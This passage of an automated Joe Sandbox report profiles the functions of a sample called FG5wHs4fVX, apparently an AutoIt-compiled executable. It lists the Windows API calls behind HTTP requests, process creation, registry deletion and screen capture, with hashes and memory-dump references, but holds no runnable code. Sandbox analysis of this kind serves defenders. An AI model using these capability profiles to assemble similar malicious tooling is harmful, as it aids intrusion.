Part of subcall function 007800ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,007A23B3,000000FF), ref: 00780138
Part of subcall function 007800ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0078014E
Part of subcall function 007800ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0078015C
Part of subcall function 007800ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0078016A
Part of subcall function 007800ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00780195
Part of subcall function 007800ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 007801A0

___scrt_fastfail.LIBCMT ref: 007800E7

Part of subcall function 007800A3: __onexit.LIBCMT ref: 007800A9

Strings

kernel32.dll, xrefs: 00780133
InitializeConditionVariable, xrefs: 00780148
api-ms-win-core-synch-l1-2-0.dll, xrefs: 00780122
WakeAllConditionVariable, xrefs: 00780162
SleepConditionVariableCS, xrefs: 00780154

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 66158676-1714406822
Opcode ID: e1e464b02618824ac9500c1223d3f65ac03174afb92702824d6c7f3fb6e5324d
Instruction ID: 482502e1b172535154e95329b980e7f3d19a96d0dfdd88fdde9c403bb2c7d5bc
Opcode Fuzzy Hash: e1e464b02618824ac9500c1223d3f65ac03174afb92702824d6c7f3fb6e5324d
Instruction Fuzzy Hash: C5210772A8070DABE7516B64AD1DB3D3394EF45BA0F004525F90192391DFAC9804CBD4

Function 007C30F7 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 400COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 007C318D
_wcslen.LIBCMT ref: 007C31F8

Strings

NAME, xrefs: 007C3335, 007C3346
INSTANCE, xrefs: 007C3453
TEXT, xrefs: 007C347C
REGEXPCLASS, xrefs: 007C3255, 007C3266
CLASSNN, xrefs: 007C31F3, 007C3204
CLASS, xrefs: 007C3188, 007C31A5

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: _wcslen
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 176396367-1603158881
Opcode ID: 32f93681b2efce1c3a45721c64d5938c678ae4f129a085908617c134fdc9368d
Instruction ID: bc18df5368729ed222c56335c4b5881bf9486c8f07cc93defc1e703c08fc0451
Opcode Fuzzy Hash: 32f93681b2efce1c3a45721c64d5938c678ae4f129a085908617c134fdc9368d
Instruction Fuzzy Hash: 4CE19132A00526EBCB189FB8C455FFDBBA4BF54710F54C11EE956E7240DB38AE858B90

Function 007D44C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00000000,00000000,007FCC08), ref: 007D4527
_wcslen.LIBCMT ref: 007D453B
_wcslen.LIBCMT ref: 007D4599
_wcslen.LIBCMT ref: 007D45F4
_wcslen.LIBCMT ref: 007D463F
_wcslen.LIBCMT ref: 007D46A7

Part of subcall function 0077F9F2: _wcslen.LIBCMT ref: 0077F9FD

GetDriveTypeW.KERNEL32(?,00826BF0,00000061), ref: 007D4743

Strings

network, xrefs: 007D469D, 007D46A2
cdrom, xrefs: 007D458F, 007D4594
ramdisk, xrefs: 007D46F1
unknown, xrefs: 007D4708
all, xrefs: 007D4531, 007D4536
removable, xrefs: 007D45EA, 007D45EF
fixed, xrefs: 007D4635, 007D463A

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: _wcslen$BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2055661098-1000479233
Opcode ID: 14401a59baa40ccc171589721e2d3f572100c73cbc6ec0b7ca6561fdadaeaa5a
Instruction ID: 9aca1d46f604ca73eacf9eb524350d8c75bf261a64b82e03771acb924ee5cc53
Opcode Fuzzy Hash: 14401a59baa40ccc171589721e2d3f572100c73cbc6ec0b7ca6561fdadaeaa5a
Instruction Fuzzy Hash: 6DB1DD316083029FC710DF28D894A6AB7F5BFA5760F50491EF59AD7391E738D844CBA2

Function 007F6CD9 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 194windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 007F6DEB

Part of subcall function 00766B57: _wcslen.LIBCMT ref: 00766B6A

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 007F6E5F
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 007F6E81
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007F6E94
DestroyWindow.USER32(?), ref: 007F6EB5
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00760000,00000000), ref: 007F6EE4
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007F6EFD
GetDesktopWindow.USER32 ref: 007F6F16
GetWindowRect.USER32(00000000), ref: 007F6F1D
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 007F6F35
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 007F6F4D

Part of subcall function 00779944: GetWindowLongW.USER32(?,000000EB), ref: 00779952

Strings

tooltips_class32, xrefs: 007F6E58, 007F6EDD
@U=u, xrefs: 007F6E81, 007F6E94, 007F6EFD, 007F6F27
0, xrefs: 007F6D98

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
String ID: 0$@U=u$tooltips_class32
API String ID: 2429346358-1130792468
Opcode ID: ee2dff219cb29b8675219472af09d590b26ba53972d1679065e413d879ad4c7c
Instruction ID: 86459960309078f97582e4e4c74e000c1a03540f0e7b35dc1733dde336afed07
Opcode Fuzzy Hash: ee2dff219cb29b8675219472af09d590b26ba53972d1679065e413d879ad4c7c
Instruction Fuzzy Hash: E9716671104248AFDB21CF18D848BBABBE9FB89704F44481DFA9987361C778ED06CB15

Function 007F911E Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00779BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00779BB2

DragQueryPoint.SHELL32(?,?), ref: 007F9147

Part of subcall function 007F7674: ClientToScreen.USER32(?,?), ref: 007F769A
Part of subcall function 007F7674: GetWindowRect.USER32(?,?), ref: 007F7710
Part of subcall function 007F7674: PtInRect.USER32(?,?,007F8B89), ref: 007F7720

SendMessageW.USER32(?,000000B0,?,?), ref: 007F91B0
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 007F91BB
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 007F91DE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 007F9225
SendMessageW.USER32(?,000000B0,?,?), ref: 007F923E
SendMessageW.USER32(?,000000B1,?,?), ref: 007F9255
SendMessageW.USER32(?,000000B1,?,?), ref: 007F9277
DragFinish.SHELL32(?), ref: 007F927E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 007F9371

Strings

@GUI_DROPID, xrefs: 007F929E
@GUI_DRAGFILE, xrefs: 007F9320
@GUI_DRAGID, xrefs: 007F92E9
@U=u, xrefs: 007F91B0, 007F9225, 007F923E, 007F9255, 007F9277

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$@U=u
API String ID: 221274066-762882726
Opcode ID: 2a9335738c2d87b9cb0462ad4de7a7bc114ef4d98ba61b701618288c8ca75968
Instruction ID: ea3681cf2b25b21df336b0c989894356df3ca58b350a89760062288c174039f7
Opcode Fuzzy Hash: 2a9335738c2d87b9cb0462ad4de7a7bc114ef4d98ba61b701618288c8ca75968
Instruction Fuzzy Hash: 84615C71108305AFC701DF64DD89DAFBBE8FF88750F00491DFA96922A1DB749A49CB52

Function 007DC476 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 143networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 007DC4B0
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 007DC4C3
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 007DC4D7
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 007DC4F0
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 007DC533
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 007DC549
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007DC554
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 007DC584
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 007DC5DC
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 007DC5F0
InternetCloseHandle.WININET(00000000), ref: 007DC5FB

Strings

InitializeCriticalSectionEx, xrefs: 007DC490
, xrefs: 007DC575

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
String ID: $InitializeCriticalSectionEx
API String ID: 3800310941-1081632753
Opcode ID: 0d4b59703ab769b4448a86ba193cbdeb34f0d51d03222def3eb0e73c5963e056
Instruction ID: 07c6731cfc7dcad94a969e0b599c3d21a366333d71218f6069d2eb2ac051ab08
Opcode Fuzzy Hash: 0d4b59703ab769b4448a86ba193cbdeb34f0d51d03222def3eb0e73c5963e056
Instruction Fuzzy Hash: 105160B150020ABFDB229F60D948ABB7BFCFF08754F14851AF946D6250DB38E954DB60

Function 007EAFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 007EB198
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 007EB1B0
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 007EB1D4
_wcslen.LIBCMT ref: 007EB200
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 007EB214
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 007EB236
_wcslen.LIBCMT ref: 007EB332

Part of subcall function 007D05A7: GetStdHandle.KERNEL32(000000F6), ref: 007D05C6

_wcslen.LIBCMT ref: 007EB34B
_wcslen.LIBCMT ref: 007EB366
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 007EB3B6
GetLastError.KERNEL32(00000000), ref: 007EB407
CloseHandle.KERNEL32(?), ref: 007EB439
CloseHandle.KERNEL32(00000000), ref: 007EB44A
CloseHandle.KERNEL32(00000000), ref: 007EB45C
CloseHandle.KERNEL32(00000000), ref: 007EB46E
CloseHandle.KERNEL32(?), ref: 007EB4E3

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
String ID:
API String ID: 2178637699-0
Opcode ID: e19c97d79ff7c26f7d68d8feaf71c419204f1d6f1136bafeb7fd895d63513f32
Instruction ID: 6150536e190fc44be50286247371759dbe566625a1e5ab48742de3c567552d3f
Opcode Fuzzy Hash: e19c97d79ff7c26f7d68d8feaf71c419204f1d6f1136bafeb7fd895d63513f32
Instruction Fuzzy Hash: E1F1AB31509380DFC715EF25C895B6BBBE4AF89314F14845DF89A9B2A2DB38EC44CB52

Function 0076326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(00831990), ref: 007A2F8D
GetMenuItemCount.USER32(00831990), ref: 007A303D
GetCursorPos.USER32(?), ref: 007A3081
SetForegroundWindow.USER32(00000000), ref: 007A308A
TrackPopupMenuEx.USER32(00831990,00000000,?,00000000,00000000,00000000), ref: 007A309D
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 007A30A9

Strings

0, xrefs: 0076327D

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
String ID: 0
API String ID: 36266755-4108050209
Opcode ID: cbc45bdb1697be619832d3e773fd88796f900b76dd097befcabe522e19de7a4a
Instruction ID: a956d8eaa7063e716288181e22cbd0f11255d24a8d232e611f63d4785b425124
Opcode Fuzzy Hash: cbc45bdb1697be619832d3e773fd88796f900b76dd097befcabe522e19de7a4a
Instruction Fuzzy Hash: DC714B70644209BFEB258F28CC49FAABF65FF45324F204306F925AA1E1C7B9AD54DB50

Function 007D14BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 007D1502
VariantCopy.OLEAUT32(?,?), ref: 007D150B
VariantClear.OLEAUT32(?), ref: 007D1517
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 007D15FB
VarR8FromDec.OLEAUT32(?,?), ref: 007D1657
VariantInit.OLEAUT32(?), ref: 007D1708
SysFreeString.OLEAUT32(?), ref: 007D178C
VariantClear.OLEAUT32(?), ref: 007D17D8
VariantClear.OLEAUT32(?), ref: 007D17E7
VariantInit.OLEAUT32(00000000), ref: 007D1823

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 007D1625
Default, xrefs: 007D16AF

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 1234038744-3931177956
Opcode ID: c296e3337919d9c1126c080fc5b6039b81304fd7e61db6b5486f41bc8036c1c0
Instruction ID: 922aec4d8a84d966dd7e2d9dd20f086fa77e05e95f30f49512f65a4120f64062
Opcode Fuzzy Hash: c296e3337919d9c1126c080fc5b6039b81304fd7e61db6b5486f41bc8036c1c0
Instruction Fuzzy Hash: 3BD1ED72A00215FBDB109F65E889B79B7B5BF45700F94805BE847AB290DB3CEC60DB61

Function 007EB60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00769CB3: _wcslen.LIBCMT ref: 00769CBD

Part of subcall function 007EC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007EB6AE,?,?), ref: 007EC9B5
Part of subcall function 007EC998: _wcslen.LIBCMT ref: 007EC9F1
Part of subcall function 007EC998: _wcslen.LIBCMT ref: 007ECA68
Part of subcall function 007EC998: _wcslen.LIBCMT ref: 007ECA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007EB6F4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007EB772
RegDeleteValueW.ADVAPI32(?,?), ref: 007EB80A
RegCloseKey.ADVAPI32(?), ref: 007EB87E
RegCloseKey.ADVAPI32(?), ref: 007EB89C
LoadLibraryA.KERNEL32(advapi32.dll), ref: 007EB8F2
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 007EB904
RegDeleteKeyW.ADVAPI32(?,?), ref: 007EB922
FreeLibrary.KERNEL32(00000000), ref: 007EB983
RegCloseKey.ADVAPI32(00000000), ref: 007EB994

Strings

RegDeleteKeyExW, xrefs: 007EB8FE
advapi32.dll, xrefs: 007EB8ED

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 146587525-4033151799
Opcode ID: ac57485eb92efb306d22a6b3d8867b19c0b9f8f08a83fd8c3eb50846cc4be153
Instruction ID: 26c757eeb700d7c29a11fec2c7d9de9d98027b15b9c8269b85340cd1820c927b
Opcode Fuzzy Hash: ac57485eb92efb306d22a6b3d8867b19c0b9f8f08a83fd8c3eb50846cc4be153
Instruction Fuzzy Hash: 2DC18D30205241EFD711DF15C498F2ABBE5BF88318F14849CE59A8B7A2CB79EC45CB91

Function 007F541D Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 191windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 007F5504
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007F5515
CharNextW.USER32(00000158), ref: 007F5544
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 007F5585
SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 007F559B
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007F55AC

Strings

@U=u, xrefs: 007F5504, 007F5515, 007F554A, 007F55C9, 007F562B, 007F5816

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: MessageSend$CharNext
String ID: @U=u
API String ID: 1350042424-2594219639
Opcode ID: f39aab52262a5b4f8af9596e6cfd826d3c7013ae511aedb6f0a7faf7091004c1
Instruction ID: 8640f485bfc11d33cd605d17b6969d3d3cf4f104704ddab29879b293d21a7c9c
Opcode Fuzzy Hash: f39aab52262a5b4f8af9596e6cfd826d3c7013ae511aedb6f0a7faf7091004c1
Instruction Fuzzy Hash: 3261497490460CEBDF11DF64CC84AFE7BB9AB09721F108149FB25AB390D7789A81DB60

Function 007E255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 007E25D8
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 007E25E8
CreateCompatibleDC.GDI32(?), ref: 007E25F4
SelectObject.GDI32(00000000,?), ref: 007E2601
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 007E266D
GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 007E26AC
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 007E26D0
SelectObject.GDI32(?,?), ref: 007E26D8
DeleteObject.GDI32(?), ref: 007E26E1
DeleteDC.GDI32(?), ref: 007E26E8
ReleaseDC.USER32(00000000,?), ref: 007E26F3

Strings

(, xrefs: 007E268D

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 26f5b5b08cacfb92be6c854aadfe82e7a1f836cf5df82c5d5605d7387bc9e43b
Instruction ID: 071ee65b59f139cf218ee6e66305733de3eb81cbc018f98f35365f17b217b559
Opcode Fuzzy Hash: 26f5b5b08cacfb92be6c854aadfe82e7a1f836cf5df82c5d5605d7387bc9e43b
Instruction Fuzzy Hash: B66112B5D00209EFCF05CFA8C984EAEBBB9FF48310F208529E955A7250E774A951CF54

Function 007CE6B0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 007CE6B4

Part of subcall function 0077E551: timeGetTime.WINMM(?,?,007CE6D4), ref: 0077E555

Sleep.KERNEL32(0000000A), ref: 007CE6E1
EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 007CE705
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 007CE727
SetActiveWindow.USER32 ref: 007CE746
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 007CE754
SendMessageW.USER32(00000010,00000000,00000000), ref: 007CE773
Sleep.KERNEL32(000000FA), ref: 007CE77E
IsWindow.USER32 ref: 007CE78A
EndDialog.USER32(00000000), ref: 007CE79B

Strings

BUTTON, xrefs: 007CE719
@U=u, xrefs: 007CE754, 007CE773

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: @U=u$BUTTON
API String ID: 1194449130-2582809321
Opcode ID: f0752126b0bc207c65d1fd7f7181a3a0678b3ae7f9c44f8cf1e43397362e024d
Instruction ID: 15b8a345257d2f4dbd280e2c4bd4984e90d4a436795e476f3312e99ec55df8ac
Opcode Fuzzy Hash: f0752126b0bc207c65d1fd7f7181a3a0678b3ae7f9c44f8cf1e43397362e024d
Instruction Fuzzy Hash: DC2157B1200609AFEB019F61ED8EF353B69FB94749B109C2DF515D2161EB7DAC10CB18

Function 0079DA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0079DAA1

Part of subcall function 0079D63C: _free.LIBCMT ref: 0079D659
